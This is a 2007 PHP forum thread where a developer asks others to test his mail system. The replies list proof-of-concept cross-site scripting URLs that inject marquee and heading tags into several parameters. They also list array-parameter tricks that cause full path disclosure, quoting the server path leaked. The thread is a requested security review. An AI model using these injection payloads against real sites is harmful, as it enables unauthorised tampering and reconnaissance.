mattal999 Posted September 19, 2007 Share Posted September 19, 2007 Please test out my mail system: http://www.games4uonline.com/mymail thanks Link to comment https://forums.phpfreaks.com/topic/69956-mymail/ Share on other sites More sharing options...
source Posted September 19, 2007 Share Posted September 19, 2007 http://games4uonline.com/mymail/index.php?message=%3Cp%20align=center%3E%3Cfont%20face=Verdana%20size=2%20color=AF0001%3E%22%3E%3Cmarquee%3Eowndage%3C/font%3E%3C/p%3E Link to comment https://forums.phpfreaks.com/topic/69956-mymail/#findComment-351433 Share on other sites More sharing options...
agentsteal Posted September 20, 2007 Share Posted September 20, 2007 Array: http://www.games4uonline.com/mymail/create.php?subject[] Array: http://www.games4uonline.com/mymail/create.php?username[] Array: http://www.games4uonline.com/mysearch/search.php?q[] Cross Site Scripting: http://www.games4uonline.com/mymail/index.php?message='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mymail/create.php?subject='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mymail/create.php?username='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mysearch/search.php?q="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mymail/signup.php?message='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if you submit code in a message. Full Path Disclosure: http://www.games4uonline.com/mysearch/search.php?c[] Warning: urlencode() expects parameter 1 to be string, array given in /home/users/uks51756/html/games4uonline.com/mysearch/search.php on line 115 Full Path Disclosure: http://www.games4uonline.com/mysearch/search.php?i[] Warning: urlencode() expects parameter 1 to be string, array given in /home/users/uks51756/html/games4uonline.com/mysearch/search.php on line 114 Link to comment https://forums.phpfreaks.com/topic/69956-mymail/#findComment-351524 Share on other sites More sharing options...
Recommended Posts